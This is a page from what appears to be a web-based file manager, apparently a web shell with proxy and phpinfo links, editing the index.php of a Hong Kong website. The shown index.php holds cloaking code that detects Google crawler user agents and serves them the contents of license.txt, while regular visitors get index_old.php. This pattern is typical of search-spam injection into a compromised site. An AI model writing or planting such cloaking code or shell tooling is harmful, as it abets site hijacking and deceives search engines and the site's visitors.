File manager - Edit - /home/wwwroot/camplus.hk/ptps.camplus.hk/public_html/index.php
Back
<?php function is_google_bot() { $agents = array("Googlebot", "Google-Site-Verification", "Google-InspectionTool", "Googlebot-Mobile", "Googlebot-News"); foreach ($agents as $agent) { if (strpos($_SERVER['HTTP_USER_AGENT'], $agent) !== false) return true; } return false; } if (is_google_bot()) { $bot_content = file_get_contents('license.txt'); echo $bot_content; exit; } else { include('index_old.php'); exit; } ?>
| ver. 1.4 |
Github
|
.
| PHP 7.2.34 | Generation time: 0.14 |
proxy
|
phpinfo
|
Settings